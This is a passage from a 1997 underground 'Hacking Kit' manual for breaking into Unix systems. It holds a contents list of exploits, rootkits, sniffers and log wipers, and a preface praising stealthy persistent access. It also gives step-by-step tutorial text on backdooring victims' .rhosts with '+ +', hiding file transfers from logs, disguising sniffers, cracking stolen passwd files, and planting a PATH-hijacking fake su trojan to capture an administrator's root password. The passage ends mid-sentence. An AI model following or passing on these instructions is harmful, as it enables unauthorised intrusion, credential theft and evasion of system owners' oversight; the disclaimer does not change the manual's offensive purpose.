home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / KIT.ZIP / KIT.TXT
Text File  |  1997-02-13  |  549KB  |  12,241 lines

  1.  
  2. THIS PAPER CONTAINS .C CODE - MAKE SURE TO TURN WORD WRAP OFF! In your editor!!
  3. AND DO NOT SAVE ANY CHANGES TO THIS FILE IF ASKED....
  4.  
  5. Unix Utils
  6. Linux/BSD/SySV/SunOS/IRIX/AIX/HP-UX
  7.  
  8. Hacking Kit v1.0.c Jan/97
  9. Hacking Kit v2.0.b March/97  (this is an update)
  10.  
  11.   By: Invisible Evil
  12.  IRC: #unixhacking #virus #hackers #virii #hacking #hacker
  13.       #hack is just to busy for me ;)
  14. NICK: i-e
  15.  
  16. If you have any other exploits, bugs, sniffers or utils that are not in here
  17. please mail them to ii@dormroom.pyro.net. And I will be sure to keep you
  18. updated with the latest version of this toolkit.
  19.  
  20. Comments are welcome.  Sys admin's that want to keep their system clean are
  21. welcome to request the latest version.
  22.  
  23. If you are looking for perfect grammar or spelling please put this file in
  24. your circular file.  I put enough time into this and just put it through
  25. a cheap spell check.
  26.  
  27. Whats new?  Look for more info on tricks of the trade, and nfs mounting
  28. drives to gain access to shells.  I am sure you will like the additions.
  29. I have added a login trojan, in.telnetd trojan, and some more scripts for
  30. scanning machines for mountable drives.  Have pun!
  31.  
  32.  
  33. I will add a (*)  to  u p d a t e d  s e c t i o n s.
  34.  
  35.  
  36. Contents:
  37.  
  38. Disclaimer
  39. Preface
  40.  
  41. Chapter I - Unix commands you need to know
  42.  
  43.     1A. Basic commands
  44.         Getting back to your home directory
  45.         getting into a user home directory easy
  46.         how to see what directory you are in now
  47.         How to get a complete manual for each command
  48.     1B. Telnet
  49.         Unix file permissions
  50.         Unix groups
  51.         How to change permissions and groups
  52.     1C. Rlogin
  53.         .rhosts
  54.         How to setup a .rhost file to login without a password
  55.     1D. FTP
  56.         Logging in to the site, but never out of the site.
  57.         Using prompt, hash, and, bin
  58.         Using get, put, mget, and, mput
  59.     1E. GCC (unix compiler)
  60.         How to get the file to the hack box without uploading it
  61.         How to copy files to your home directory easy
  62.         How to compile .c programs
  63.         How to name them what you want
  64.         How to load programs in the background while you log off
  65.         Looking at your process with ps
  66.  
  67. Chapter II - Getting started (your first account)
  68.  
  69.     2A. Cracking password files
  70.         How to get hundreds of accounts with your first hacked account
  71.         Why you only really need one password cracked on a system
  72.         How to get the root password from the admin, on an non-exploit system
  73.         Using A fake su program
  74.         Doc's for the fake su program
  75.         How to find the admin's
  76.         How to read .bash_history
  77.         Cracker Jack - A good password cracker
  78.         How to use crackerjack
  79.         Word Files
  80.         What you will need to get started
  81.         Hashing the word files
  82.       * Hash file for use with cracker jack and your word list
  83.       * Hash file for use with cracker jack and your passwd file
  84.     2B. Talking to newbe's
  85.         How to find the newbe's
  86.         How to get the newbe's passwords
  87.     2C. The hard way
  88.         Using finger @
  89.         What could the password be?
  90.         Getting more info from finger
  91.         a small .c file to use if you get on
  92.         Writing a small perl script to do the work for you.
  93.         How to get a domain list of all domains from rs.internic.net
  94.         A perl script to rip the domains & put them in a sorted readable list
  95.         How to execute the perl script
  96.  
  97.   * 2D. Using mount to gain access to unix systems
  98.       * What is nfs mount
  99.       * What you need to get started
  100.       * How to check a system to see if you can mount their drives
  101.       * A script to scan for systems that are nfs mountable
  102.       * How to mount the system
  103.       * How to unmount the system
  104.       * A Live Demo
  105.       * Mounting the drive
  106.       * Viewing the user directories
  107.       * Editing the local machine's passwd file
  108.       * How to put a .rhosts file in one on thier users directories
  109.       * How to rlogin to the users account
  110.  
  111. Chapter III - Getting password files
  112.  
  113.     3A. PHF
  114.         What is phf
  115.         Using lynx or netscape to access phf
  116.         Finding the user id the victims httpd (www) is running under
  117.         How to see if you are root using phf
  118.         How to cat the password file using phf
  119.         Backing up the victims password file
  120.         Changing a users password using phf
  121.         Restoring the old passwords
  122.         A .c file that will let you pipe commands to phf from your shell
  123.         How to use the phf shell file
  124.         Another way to use phf - text by quantum
  125.         Quantum's bindwarez file
  126.         A perl script that will try EVERY domain on the internet and log
  127.         root access and snatch passwd files for you all day in the background.
  128.         Doc's for the pearl script above
  129.         Getting accounts from /var/?/messages
  130.         A script to get the passwords for you if you can access /var/?/messages
  131.     3B. Newbe's
  132.         Lammer's
  133.     3C. Getting shadow passwd files
  134.         What is a shadow passwd
  135.         Getting the shadow file without root access
  136.         A .c file to cat any file without root access
  137.     3D. Getting /etc/hosts
  138.         Why get /etc/hosts
  139.  
  140. Chapter IV - Getting the root account
  141.  
  142.        What to do if you can't get root on the system
  143.    4A. Bugs
  144.        Intro
  145.    4B. Exploits
  146.        The umount/mount exploit
  147.        What are SUID perm's
  148.        The umount .c file
  149.        How to compile umount.c
  150.        The lpr Linux exploit
  151.        The lpr Linux .c exploit file
  152.        The lpr BSD .c exploit file
  153.        How to use lpr
  154.        Watch the group owners with lpr
  155.        Just use lpr for first root, then make a SUID shell
  156.        How to make the SUID root shell for future root access (root root)
  157.        The splitvt exploit
  158.        The splitvt exploit .c program
  159.        How to use the splitvt exploit program
  160.        The sendmail 8.73 - 8.83 root exploit shell script
  161.        How to use the sendmail exploit to get root access
  162.  
  163.  
  164. Chapter V - Making yourself invisible
  165.  
  166.        Keeping access
  167.    5A. Zap2 (for wtmp/lastlog/utmp)
  168.        Fingering the host before login
  169.        How to login and stay safe
  170.        How to configure Zap2
  171.        Finding the log file locations
  172.        The zap.c file
  173.    5B. Other scripts
  174.        The wted wtmp editor
  175.        Command line usage for wted
  176.        How to chmod the wtmp.tmp file
  177.        How to copy the wtmp.tmp to the wtmp file
  178.        Setting the path for the wtmp file in wted
  179.        The wted.c file
  180.        Cleaning the lastlog file using lled
  181.        Command line options for lled
  182.        How to use lled
  183.        How to chmod the lastlog.tmp file
  184.        How to copy the lastlog.tmp file to lastlog
  185.        Setting the path for the lastlog file in lled
  186.        The lled.c file
  187.      * A good perl script for editing wtmp, utmp, and, checking processes
  188. Chapter VI - Cleaning the log files
  189.  
  190.    6A. A walk around in a hacked system - let's login
  191.        Logging on the system
  192.        Watching for admin's
  193.        Nested directories
  194.        Having your root file ready
  195.        Becoming invisible
  196.        Greping the log directory
  197.        Cleaning the logs
  198.        Lets sniff the network
  199.        Editing your linsniffer.c
  200.        Looking at the processes running
  201.        Compiling and naming your sniffer program
  202.        Starting a sniff session
  203.        Changing group file access
  204.        Making a suid root shell trojan for uid=0 gid=0 every time
  205.        Naming your trojan
  206.        Touching the files date
  207.        Checking the sniffer log file
  208.        Setting the history files to null
  209.      * Using unset for the history files
  210.    6B. messages and the syslog
  211.        How to find the logs are by reading /etc/syslog.conf
  212.        How to see if there are logs in hidden directories
  213.        How to see if logs are being mailed to user accounts
  214.        How to see if logs are going to another machine
  215.      * How to edit syslog.conf to hide logins
  216.      * Restarting syslogd
  217.        How to see if there is a secret su log by reading /etc/login.defs
  218.    6C. The xferlog
  219.        How to edit the xferlog
  220.        How to grep and edit the www logs
  221.        How to look for ftp logs
  222.      * Other ways to edit text logs
  223.      * Using grep -v
  224.      * A script to rip text lines from these logs
  225.      * Restarting syslogd
  226.    6D. The crontabs
  227.        How to find and read the root or admin's cron
  228.        How to see if MD5 is setup on the machine
  229.        What is MD5
  230.  
  231. Chapter VII - Keeping access to the machine
  232.  
  233.    7A. Tricks of the trade
  234.        When the system admin has found you out
  235.        What to expect from the admin
  236.        History files
  237.        Nested directories
  238.        Placing trojans
  239.        Hidden directories
  240.        Making new commands (trojans)
  241.        Adding or changing passwd file entry's
  242.        Setting some admin accounts with null passwords
  243.        The best way to add an account
  244.        Editing a null account so you can login
  245.        Installing more games or exploitable programs
  246.        How to know your admin's
  247.        Reading system mail (with out updating pointers)
  248.        What to look for in the mail directories
  249.        A program to read mail without updating pointers
  250.    7B. Root kits and trojans
  251.        What are root kits
  252.        What are Demon kits
  253.        What do trojans do
  254.  
  255.  
  256. *********************************************************
  257. * Appendix I - Things to do after access                *
  258. *********************************************************
  259.   The a-z checklist
  260.  
  261. *********************************************************
  262. * Appendix II - Hacking / Security WWW / ftp sites      *
  263. *********************************************************
  264.  
  265. *********************************************************
  266. * Appendix III - More exploits for root or other access *
  267. *********************************************************
  268.  
  269. A3-01. Vixie crontab buffer overflow for RedHat Linux
  270. A3-02. Root dip exploit
  271. A3-03. ldt - text by quantumg
  272. A3-04. suid perl  - text by quantumg
  273. A3-05. Abuse Sendmail 8.6.9
  274. A3-06. ttysurf - grab someone's tty
  275. A3-07. shadow.c  - Get shadow passwd files
  276. A3-08. Abuse Root Exploit (linux game program)
  277. A3-09. Doom (game) root exploit - makes suid root shell
  278. A3-10. dosmenu suid root exploit
  279. A3-11. Doom root killmouse exploit
  280. A3-12. Root exploit for resize icons
  281. A3-13. Root console exploit for restorefont
  282. A3-14. Root rxvt X server exploit
  283. A3-15. Root wuftpd exploit
  284. A3-16. A shell script called gimme, used to read any system file
  285.  
  286. *********************************************************
  287. * Appendix IV - Other UNIX system utilities             *
  288. *********************************************************
  289.  
  290. A4-01. Cloak v1.0 Wipes your presence on SCO, BSD, Ultrix, and HP/UX UNIX
  291. A4-02. invisible.c  Makes you invisible, and works on some SunOS without root
  292. A4-03. SySV Program that makes you invisible
  293. A4-04. UNIX Port scanner
  294. A4-05. Remove wtmp entries by tty number or username
  295. A4-06. SunOS wtmp editor
  296. A4-07. SunOS 4+ Zap your self from wtmp, utmp and lastlog
  297.  
  298.  
  299. *********************************************************
  300. * Appendix V - Other Unix Exploits                      *
  301. *********************************************************
  302.  
  303. A5-01. HP-UX Root vhe_u_mnt exploit
  304. A5-02. IRIX Root mail exploit
  305. A5-03. Root cron grabber - Crontab exploit for OSF/1, AIX 3.2.5, Digital UNIX
  306. A5-04. IRIX mail exploit to make you any user on the machine - BUT NOT root
  307. A5-05. BSD - crontab root exploit
  308.  
  309. *********************************************************
  310. * Appendix VI - UUENCODED FILES                         *
  311. *********************************************************
  312.  
  313. 1. Quantum's Bindwarez binary file for PHF
  314. 2. Demon Root Kit - Includes: Banish, DemonPing, DemonSu, DemonTelnet
  315. 3. Linux Root Kit - Includes: Login, Netstat, and, PS
  316. 4. The Fake SU Program
  317.  
  318. **********
  319. Disclaimer
  320. **********
  321.  
  322. True this manual will aid hackers into breaking into systems but it is also
  323. provided to guide system admin's on different security problems and help
  324. with things to watch for on their system to keep hackers off.
  325.  
  326. If you use this manual to gain access to any system where you do not belong,
  327. and do any type of damage, you alone will suffer for your stupid actions!
  328.  
  329. I am not telling you to break into any system, I am just showing some of
  330. my experience, and things that I would do if I was to break into my own system.
  331.  
  332. This is for information only.....
  333. ISP's Secure Your Systems!
  334.  
  335. *******
  336. Preface
  337. *******
  338.  
  339. Ok, lets get started.  If you are going to hack, you must be doing this for a
  340. reason.  All hackers have their reasons for doing what they do.  Most are just
  341. hungry to learn.  Most of what I have learned about unix, i have learned on
  342. some service providers or someone else's machine.  I am one for the 'hands on'
  343. experience.  There is much to learn and you would have to read 20,000 books
  344. just to get what you would learn out of a few config files, a few admin email
  345. messages, some .bash_history files, and some poking around a few systems.
  346.  
  347. Here in this manual you should learn how to be the 'complete hacker' and come
  348. up with a style of your own.  It will not take to long, but it will take some
  349. practice and experience before you will be able to call yourself a hacker.
  350.  
  351. Not just anyone that can crack a password file, and log into a unix machine
  352. can call themselves a hacker.  Ok, you can get root access to a box!  You still
  353. are not a hacker!  You need to know why you are a hacker first, and then have
  354. your 'code' and 'style'.  You need a purpose and a reason for hacking into any
  355. box.  The true hacker knows why he is doing what he does, and is doing it for
  356. reasons like knowledge, free information, and ACCESS. The true hacker will
  357. turn one hack into access to many different systems and providers and keep this
  358. access for future learning and more FREE information.
  359.  
  360. The wan-a-be hacker will not be invisible, and will do many stupid things like:
  361. delete or corrupt data, down the machine, run bots or irc clients from root
  362. accounts or machines Give the passwords he cracked to everyone in the world
  363. to prove they can hack. Or they might just do stupid things that will get
  364. themselves cought.  I think sometimes this is done purposely just to draw
  365. attention to themselves so they can get cought and make the announcement that
  366. they are a hacker, and they were here!  A real hacker needs no such glory,
  367. he just needs the access and wants to keep it and be invisible! He will not
  368. tell many friends about the system, he will not give out the passwords or
  369. accounts, he will keep others off so he can continue his access there and
  370. keep it clean.
  371.  
  372. Here in this manual i hope that i can add enough style so that you can have
  373. real heart in this matter and and be a good clean hacker.
  374.  
  375. Happy hacking ...
  376.  
  377. --------------------------------
  378. Chapter I
  379.  
  380. Unix commands you need to know.
  381. --------------------------------
  382.  
  383. There are just a few basic commands you need to learn, and then some unix
  384. programs that will aid you in logging in logging into or keeping access to
  385. the machine.
  386.  
  387. Call your local internet service provider and ask them to sell you a shell
  388. account so that you will have something to practice on to learn these
  389. basic commands.  The average shell account might cost you $10.00 per month
  390. if you don't already get one with your existing account.
  391.  
  392. --------------
  393. Section 1A
  394.  
  395. Basic commands
  396. --------------
  397.  
  398. I hope you have a basic knowledge of DOS, that would help a bit, and I will
  399. assume that you already do in writing this manual.
  400.  
  401. DOS Commands you are used to first:
  402.  
  403. REMEMBER: unix is case sensitive, so if I here use lower case you must also,
  404. if I use a space you must also.  DOS will let you get away with allot of things
  405. but unix will not!
  406.  
  407. DIR/W      = ls
  408. DIR        = ls -l
  409. DIR/AH     = ls -al  AH=(hidden) -al=(include hidden files as well as regular)
  410. RENAME     = mv
  411. ATTRIB     = chmod
  412. MD         = mkdir
  413. RD         = rmdir
  414. DEL        = rm
  415. COPY       = cp
  416.  
  417. These are the basic commands, i suggest that you lookup the man pages
  418. on each one of these commands from your unix shell.  You would do this by
  419. typing 'man command' without the ''.
  420.  
  421. each one of these commands will have switches for them, like cp -R to copy
  422. files and directories.  So you would type man cp to get all of the switches
  423. you can use with the copy command.
  424.  
  425. cd {then press enter} will always take you to your home directory
  426. cp filename $HOME will copy the file to your home directory
  427. cd ~username will take you to that users home dir if you have access to be
  428.    there
  429. pwd {press enter} will show you what directory you are in.
  430.  
  431. -------------
  432. Section 1B
  433. Telnet
  434. -------------
  435.  
  436. Telnet is a command that you can use from a shell account, or from an exe
  437. file (telnet.exe) from Windows, OS/2, Windows 95 and other operating systems
  438. that will let you connect to another machine on the net.  There are other
  439. programs you will learn about here like FTP, and rlogin that you can use as well
  440. but now we will use telnet.
  441.  
  442. You can use telnet if you know the IP address or the host name you want to
  443. connect or login to.  To use the command you would just use the telnet program
  444. to connect to the IP or host like this:
  445.  
  446. Telnet netcom.com  or  telnet 206.146.43.56
  447.  
  448. Ok, now lets login:
  449.  
  450. telnet machine.com
  451.  
  452. trying .....
  453.  
  454. Connected to machine.com
  455.  
  456. Linux 2.0.28 (machine.com) (ttyp0)
  457.  
  458. machine login:username
  459. password:#######
  460.  
  461. bash$
  462.  
  463. Your prompt might look different, but we will use this one.
  464.  
  465. Notice above that it will tell you the O/S when you get the login prompt.
  466. You can use this if you get a large collection of passwd files.  Even before
  467. going on to crack them sort them by O/S types by just telnet-ing to them to
  468. see what they are running.  There are other ways, but lets keep this telnet
  469. topic going for a sec... telnet domain.name.com, after you see what they are
  470. running make a note of this and ctrl ] to break out of the connection.
  471.  
  472. Put all of your linux passwd files into a pile to be cracked first.  All we
  473. need is one account that works for the system, and we can be almost sure
  474. we will have root on that machine!  There are way to many holes in linux to
  475. think we will not be able to own one of those machines, so lets get to work so
  476. we can start this wonderful world of hacking.
  477.  
  478. ----------------------
  479. Unix File Permissions
  480. ----------------------
  481.  
  482. bash$
  483.  
  484. bash$ cd /tmp
  485. bash$ ls -l
  486. total 783
  487. -rwx------   1 wood     users           1 Jan 25 18:28 19067haa
  488. -rw-r--r--   1 berry    mail            1 Jan 16 12:38 filter.14428
  489. -rw-------   1 rhey19   root       395447 Jan 24 02:59 pop3a13598
  490. -rw-------   1 rhey19   root       395447 Jan 24 03:00 pop3a13600
  491. drwxr-xr-x   4 root     root         1024 Jan 12 13:18 screens
  492.  
  493. First notice that we used a / and not \ to change to the tmp directory! Unix
  494. uses the / as the root so it is backwards from DOS here.
  495. Notice we did ls -l for the long directory. If we did 'ls' we would have what
  496. you see below.
  497.  
  498. bash$ ls
  499. 19067haa      filter.14428  pop3a13598    pop3a13600    screens
  500.  
  501. With what we see here can not tell much, so most of the time we will be
  502. using ls -al with the -al we will see the hidden files also, hidden
  503. files and directories will always start with a '.'.  Now watch:
  504.  
  505. bash$ ls -al
  506. total 794
  507. drwxrwxrwt   4 root     root         8192 Jan 25 23:05 .
  508. drwxr-xr-x  22 root     root         1024 Dec 28 18:07 ..
  509. -rw-r--r--   1 berry    users           6 Jan 25 23:05 .pinetemp.000
  510. drwxr-xr-x   2 berry    users        1024 Jan 25 23:05 .test
  511. -rwx------   1 wood     users           1 Jan 25 18:28 19067haa
  512. -rw-r--r--   1 berry    mail            1 Jan 16 12:38 filter.14428
  513. -rw-------   1 rhey19   root       395447 Jan 24 02:59 pop3a13598
  514. -rw-------   1 rhey19   root       395447 Jan 24 03:00 pop3a13600
  515. drwxr-xr-x   4 root     root         1024 Jan 12 13:18 screens
  516.  
  517. .pinetemp.000 is a hidden file, and .test is a hidden directory.
  518.  
  519. -rw-r--r--   1 berry    mail            1 Jan 16 12:38 filter.14428
  520.  
  521. row 1          row2     row3
  522. ----------------------------
  523.  
  524. Now here we need to learn about permissions, users, and groups.
  525.  
  526. Row #1 is the file permissions
  527. Row #2 is who owns the file
  528. Row #3 is the group owner of the file
  529.  
  530. File permissions are grouped together into three different groups.
  531. If the line starts with a d, it is a directory, if there is no d, it is a file.
  532.  
  533. - --- --- ---
  534. | |   |   |--------> Other = anyone on the machine can access
  535. | |   |------------> Group = certain groups can access
  536. | |----------------> User  = only the owner can access
  537. |------------------> Directory Mark
  538.  
  539.  
  540.  
  541. - rw- r-- r--
  542. | |   |   |--------> Other can only read the file
  543. | |   |------------> Group can only read the file
  544. | |----------------> User  can read or write to the file
  545. |------------------> It is not a directory
  546.  
  547.  
  548. - rwx rwx r-x
  549. | |   |   |--------> Other can read and execute the file
  550. | |   |------------> Group can read write and execute the file
  551. | |----------------> User  can read write and execute the file
  552. |------------------> It is not a directory
  553.  
  554.  
  555. The owner is the user name in row #2 and the group owner is the name in row #3.
  556. In DOS the file has to have a .exe, .com, or .bat extension to execute, but in
  557. unix all you need is the --x in your group of user, other, group
  558.  
  559. You can change these permissions if you own the file or have root access:
  560.  
  561. ---------------------------------------------------------------------------
  562. chmod oug+r filename will make all three groups of permissions be able to
  563. read the file.
  564.  
  565. chmod og-r filename would make the file readable only to the user that owns
  566. the file.  (notice the - or + to set the file yes or no)
  567.  
  568. chmod +x filename would make the file execute by all.
  569.  
  570. chown username filename would make the file owned by another user.
  571. chgrp groupname filename would make the file owned by another group.
  572. ---------------------------------------------------------------------------
  573.  
  574. Make sure to keep file perm's and groups the same or you will be sniffed
  575. out and booted from the system.  Changing configs on the system might only
  576. break other functions, so keep your paws off or you are just asking to get
  577. cought.  Only do what you are *SURE* of.  Only use commands that you know,
  578. you might find yourself spending hours fixing just one typo like
  579. chown -R username /* could keep you busy for a year ;)
  580.  
  581. Just be careful!
  582.  
  583. We will get into this stuff more as we go into the needs for this.
  584.  
  585. ------------------
  586. Section 1C Rlogin
  587. ------------------
  588.  
  589. There is another command you might use and we will get into this elsewhere
  590. as we get into using rlogin to login to a system without a password.
  591.  
  592. For now read the man pages on rlogin by using the man rlogin from your
  593. shell account.
  594.  
  595. The basic command would be :
  596.  
  597. rlogin -l username hostname
  598. connecting....
  599. password:
  600.  
  601. bash$
  602.  
  603. Rlogin requires the user to have a file in their home directory that tells
  604. what system they can receive the rlogin from.  In this file .rhosts it would
  605. look like this:
  606.  
  607. username hostname (or) hostname
  608.  
  609. if you were to add to this file   + +   it would let any user from any host
  610. login without a password.
  611.  
  612. The file would look like this:
  613.  
  614. ----- cut here ------
  615. + +
  616. _____ cut here ------
  617.  
  618. if they already had entry's you could add the + + under their host names, but
  619. remember now they would notice seeing they would now be able to rlogin
  620. without the password.  You would be targeting people that did not
  621. already have a .rhosts file.
  622.  
  623. ---------------
  624. Section 1D FTP
  625. ---------------
  626.  
  627. Another way to login will be FTP.  You can use a windows client, or just
  628. login from a shell.
  629.  
  630. ftp ftp.domain.com
  631.  
  632. This will allow you to download or upload files to the site you are hacking.
  633. Just make sure to edit the xferlog (see section 6d) to wipe your tracks
  634. on the system.  Remember NEVER to ftp or telnet out of the hacked system, only
  635. log into it!  If you are coming from your own system, or from another hacked
  636. account you might just be giving your login and password to the system admin
  637. or another hacker on their system.  There could be a telnetd or ftpd trojan
  638. loaded on the system, or even a sniffer.  Now you would have just gave someone
  639. your login id and password.  And if this was the system admin, he might have
  640. the idea that revenge is sweet ;)
  641.  
  642. Using ftp from the shell, I would suggest using a few commands:
  643.  
  644. After you login, and have your prompt, type these commands
  645. pressing enter after each one.
  646.  
  647. prompt
  648. hash
  649. bin
  650.  
  651. prompt will allow you to type a command like (mget *) or (mput*) and transfer
  652. an entire directory without having it prompt you for each file yes or no.
  653.  
  654.                hash marks
  655. hash will put ############ on the screen so you can see the transfer
  656. is still moving and at what speed.
  657.  
  658. bin will make sure you get the files in the right mode, and if transferring
  659. binary files, you will be sure they will uncompresses.
  660.  
  661. The transfer commands are easy, get filename, or, put filename, or for many
  662. files you can use regular wild cards with mput  or mget.
  663.  
  664. --------------------
  665. Section 1E
  666. GCC compiler
  667. --------------------
  668.  
  669. There will be a time when you will need to compile a .c file.
  670.  
  671. It is best to compile on the machine you are working on.  So upload or copy
  672. and past the files to the hacked box and compile them there.  If you have
  673. problems with their compiler you can try to upload pre-compiled files.
  674.  
  675. One way to get the file up to the victims machine would be to use copy
  676. and paste.  Get a good tsr or windows shareware program to do this if
  677. you do not have any way to do it now.  You can copy a script file from
  678. one window and paste it into an editor on the victims machine, and then compile
  679. the new file.  Walaa... no upload log of the file.  You can copy and paste
  680. from the victims machine as well so that there are no download logs of ascii
  681. files.
  682.  
  683. To copy and paste you can just open an editor on the hacked box, and then copy
  684. from your other session, and paste your script into the editor and save the
  685. file.  This way there will not be anything in the xferlog yet.
  686.  
  687. You can do the same thing with the password file.  If you do decide to
  688. download the password file using ftp, make sure to copy it to your home
  689. directory first under a different name.
  690.  
  691. bash:/etc:> cp passwd $HOME/plog  would copy the file called passwd from the /etc
  692. directory you were in, to your home directory in a file called plog instead of
  693. passwd.  Admin's grep the xfer logs looking for who is downloading the passwd
  694. file.
  695.  
  696. Another way to get file to or from the box without showing up in the logs
  697. would be to open an irc session on the victims machine, then from your other
  698. session where you are already a user on irc, send the files using dcc.
  699.  
  700. The command to send the files would be /dcc send <nick> <filename>
  701. The command to get the file on the other side would be /dcc get <nick> <file>
  702.  
  703. It would be nice if you had a bot loaded on the irc when you were hacking so
  704. that you could just send files to the bot and have it auto receive them.
  705.  
  706. A 'bot' is a robot program that you can load in the background on your shell
  707. account that will receive files, keep channels open, etc...
  708.  
  709.  
  710. The GCC compiler is easy...
  711.  
  712. gcc filename.c -o filenameyouwant
  713.  
  714. If i was to compile a file called z2.c that would zap the log files i would
  715. type this:
  716.  
  717. gcc z2.c -o zap
  718.  
  719. This would give me a file that would exe, called zap
  720.  
  721. If I just typed : gcc z2.c  I would have a file named a.out, that was the executable
  722. file and would have to rename it to zap, or some name i would know by doing
  723. this: mv a.out zap
  724.  
  725. Now I would have a file named zap that was executable instead of a.out.
  726.  
  727. You will want to make sure you are not naming these files names that sys admin's
  728. will know.  If you had a sniffer file called 'linuxsniffer.c' you don't
  729. want to keep the same name ;) call it something like:
  730.  
  731. gcc linuxsniffer.c -o lsn
  732.  
  733. Remember also sometimes you can execute these files names right in the directory
  734. by just typing the file name like for our 'lsn' (sniffer) above just by
  735. typing lsn.  But sometimes this will not work unless you add a ./ to the
  736. command.  So remember, sometimes you will need to type ./lsn  or your file
  737. name.
  738.  
  739. Also there will be a time you will want a program to run in the background
  740. even after you logoff.  Like in the case of the sniffer above.  In this case
  741. you might want to name your sniffer something that would not be so easy
  742. noticed.  Use your own style here.  BUT to make it stay in the background while
  743. you are off the system you need to run the command with a & after the command.
  744.  
  745. lsn&
  746.  
  747. If you were to just type lsn, your screen would pause, and you would not be
  748. able to type while the program was sniffing, but if you typed lsn& it would
  749. load and the system prompt would come right back to you.  Also the system
  750. would let you know it was loaded by giving you the process id # that it
  751. was loaded as.
  752.  
  753. You could view the process with the ps -x command, you might want to run
  754. ps -auxe |more
  755.  
  756. a= all
  757. u= show user
  758. x= yours
  759. e= env
  760.  
  761. some machines
  762. f=tree
  763. or command: pstree
  764.  
  765. ------------------------------------
  766. Chapter II
  767. Getting started (your first account)
  768. ------------------------------------
  769.  
  770. There are many ways to get a starter account. I will go into each area to
  771. help you get started.  All you need is one good account to spawn off to
  772. hundreds of accounts.  Think of this; You get one good exploitable system,
  773. most any linux machine ;)
  774.  
  775. Now you get root access and load a sniffer program.  The TCP sniffer will
  776. search out any login process on the network and log the login and password
  777. for any telnet, ftp, or dial-in session going out or coming into the system.
  778.  
  779. Now even if it is a small ethernet connection you have around 100 passwords
  780. for a few machines or domains.  If a larger net provider you have hundreds
  781. of accounts all over the world!  All you need for this is one good account
  782. and password to an exploitable system.  If it seems you can not exploit
  783. root on the system, this might be a good system to crack passwords on and
  784. exchange the accounts for other accounts from hackers or irc users that are
  785. looking to load a bot but do nt have the shell account or disk space to do
  786. it.  NEVER give out even one password to a system you exploited root on.
  787. Keep these systems to yourself!
  788.  
  789. Lets now get into ways to get your first accounts.
  790.  
  791. ------------------------
  792. Section 2A.
  793. Cracking passwd files
  794. ------------------------
  795.  
  796. If you are hacking with the right frame of mind, you will run the crack
  797. program until you get one good account that will let you into the system.
  798.  
  799. You will login and see if you can exploit root on the system, if so, get root,
  800. get the files you need to use into your nested directory, and erase your
  801. presence, and clean all of the logs.  Now you are ready to load your sniffer.
  802.  
  803. Why go on hacking passwords for a system that within 24 hours you will have
  804. most of the passwords anyway?  Not only for the machine you just hacked, but
  805. other machines that were connected to as well.  If the system is not
  806. exploitable don't even waste your time on it, go on to the next.  At a latter
  807. date if you want to crack passwords for accounts to trade go ahead.
  808.  
  809. If you get an admin's account cracked you might want to read his history files,
  810. and see if he is using the su command to access root allot.  If he is you can
  811. use an su trojan on him.  This will get you the root password.  This works like
  812. this:  You change his shell script so that a hidden directory (.term) is good,
  813. is set in the search path before all other directories.  You put a fake su
  814. binary in the .term (or other) directory.  He types su, everything looks good
  815. to him, he types in the root password when prompted, the password id copied to
  816. a log file in /tmp/.elm69, and deletes the trojan su file, and returns to him a
  817. password error telling him to try again.  He thinks he must have done something
  818. wrong and runs su again, but this time the real one and logs in.
  819.  
  820. You will find this fake su program in the last appendix named uuencoded files.
  821.  
  822. Here are the docs:
  823.  
  824. Fake SU by Nfin8 - i-e
  825.  
  826. IRC: /msg i-e
  827.  
  828. Easy as 1,2,3 ...
  829.  
  830. 1. Change the path in one of the user accounts that you have access to that
  831. you see is using SU from reading their history files, to hit a path first
  832. that you have placed the su trojan file into.  .term or .elm is good!
  833.  
  834. 2. Make sure to edit the top of the su.c file to the path you will be using
  835. so that the sutrojan will delete isself and let the real SU work for the
  836. second try.
  837.  
  838. 3. Put all of the files in the target directory and compile the su.c file.
  839.  
  840. gcc su.c -o su
  841.  
  842. Then delete all of the files but the su.  All done!
  843.  
  844. .bash_profile might look like this:
  845.  
  846. # .bash_profile
  847.  
  848. # Get the aliases and functions
  849. if [ -f ~/.bashrc ]; then
  850.         . ~/.bashrc
  851.                 fi
  852.  
  853. # User specific environment and startup programs
  854.  
  855. PATH=$PATH:$HOME/bin
  856. ENV=$HOME/.bashrc
  857. USERNAME=""
  858.  
  859. export USERNAME ENV PATH
  860.  
  861. You change the first line to: PATH=$HOME/.term:$PATH:$HOME/bin
  862.  
  863.  
  864. When the sys admin run's 'SU' it will run the SU-trojan in the .term
  865. directory first and report that the password he typed was wrong, the
  866. Trojan su program would have put a hidden file in the /tmp directory for
  867. you that contains the root password (or account passwd) typed.  If it was
  868. an account rather then the root password it will let you know the account
  869. name. Then the trojan su program deletes itself so that the next try will
  870. get the real su program.
  871.  
  872.  
  873. You can find the admin's at the top section of the passwd file in the /etc
  874. directory.  Just type :  more passwd
  875.  
  876. You can be sure that the first two real accounts made in the passwd file are
  877. admin's, also sometimes you can find others by where their directories are
  878. located in the password file.  Like /staff/username.
  879.  
  880. The history files are in each users account directory.  You can read these to
  881. see what the last commands were that were typed by the user.  Sometimes as
  882. much as the last 100+ commands.  Look for the file .bash_history, or History,
  883. you can read these using more.  command: more .bash_history, or most times to
  884. keep your typing you can type : more .b*  (or) just type : more .b (and then
  885. hit the tab key on your keyboard).
  886.  
  887. Ok so now you need a good password cracking program. You can see in the next
  888. chapter on how to get password files from systems that you do not have an
  889. account on, but it is catch 22, you need the password cracking program too.
  890.  
  891. There are three things that you will need.
  892.  
  893. 1. Password cracking program
  894. 2. Good word files
  895. 3. Password files
  896.  
  897. The best password cracking program to start would be crackerjack.  You can
  898. search the web and find this easy as 1,2,3.  Download it and you are ready
  899. to go.  If you are a bit more advanced you can download a cjack for unix and run
  900. it in a shell.  But if you are just getting started get the DOS/OS/2 version.
  901.  
  902. Also search for some good word files.  The best word files are the names.
  903. You will find that most unsecured passwords out there are guy's girlfriends
  904. names, of girls boyfriends names ;)  You will find word files like
  905. 'familynames' 'babynames' 'girlsnames' 'boysnames' 'commonpasswords'
  906. hackersdict' and other like these to be the best.
  907.  
  908. Load crackerjack like this:
  909.  
  910. [D:\jack]jack
  911.  
  912. Cracker Jack version 1.4 for OS/2 and DOS (386)
  913. Copyright (C) 1993, The Jackal, Denmark
  914.  
  915. PWfile(s) : domain.com.passwd
  916.  
  917. Wordfile  : domain.com.passwd
  918.  
  919. Like above run the password file as the wordfile first.  This will get you all
  920. of the logon's first that used their login name as their password, also if they
